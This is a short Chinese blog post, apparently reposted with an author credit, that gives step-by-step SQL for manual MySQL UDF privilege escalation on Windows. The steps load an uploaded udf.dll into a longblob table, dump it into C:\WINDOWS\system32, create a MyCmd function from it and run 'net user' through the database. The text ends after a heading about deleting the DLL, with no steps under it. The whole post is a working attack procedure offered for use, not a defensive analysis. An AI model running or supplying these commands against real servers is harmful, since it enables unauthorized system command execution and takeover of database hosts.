udf手动导出提权
当默认udf导出失败时,可以尝试用手动方法导出udf进行提权,具体方法如下:
先上传udf.dll,连接到mysql,再按下面步骤执行sql语句。
复制代码
create table zz(abc longblob);//注意列类型为longblob
insert into zz values(load_file(‘C:\udf.dll’)); //上传的udf.dll路径
select * from zz into dumpfile ‘C://WINDOWS//system32//udf.dll’; //导入的目标地址 mysql 5.0以上要导入到系统目录
Create Function MyCmd returns string soname ‘udf.dll’; //这里如果导出的路径为C://WINDOWS//system32//udf2.dll’ 可以将后面改成udf2.dll
select MyCmd (‘ net user ‘);
drop function MyCmd;
删除udf.dll 的方法,先删除生成的函数
- 原文作者:槛外小筑
- 原文链接:https://www.kwxiaozhu.com/archives/436.html
- 版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议. 进行许可,非商业转载请注明出处(作者,原文链接),商业转载请联系作者获得授权。